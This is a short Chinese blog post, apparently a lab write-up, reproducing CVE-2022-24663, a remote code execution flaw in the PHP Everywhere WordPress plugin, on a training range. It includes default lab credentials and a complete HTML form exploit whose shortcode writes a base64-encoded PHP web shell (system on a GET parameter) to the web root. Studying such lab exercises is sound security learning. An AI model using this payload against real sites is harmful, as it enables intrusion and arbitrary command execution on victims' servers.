春秋云境CVE-2022-24663复现

CVE-2022-24663

wordpress插件PHP Everywhere RCE 2.0.3以下

利用春秋云境上的靶场

访问页面

wordpress的默认后台是wp-admin

默认密码test/test

提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码

这里指的是任意PHP代码并且是任意位置

1.构建payload

随便找个html页面进行exp注入(摘抄大佬的payload)

记得要修改域名为自己现在做的靶场域名

并且这里的代码使用的是system

我使用eval函数无法进行访问(求大佬指点)

<form action="http://eci-2ze5uttid7svzb873n4j.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post"> <input name="action" value="parse-media-shortcode" /> <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea> <input type="submit" value="Execute" /> </form>

2.插入payload

3.出现这个框之后,直接把这个框里面的内容全部替换成上面的代码,然后直接点击【Execute】:

4.注入成功

5.访问fuck.php文件,进行代码执行

求大佬指点错误。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值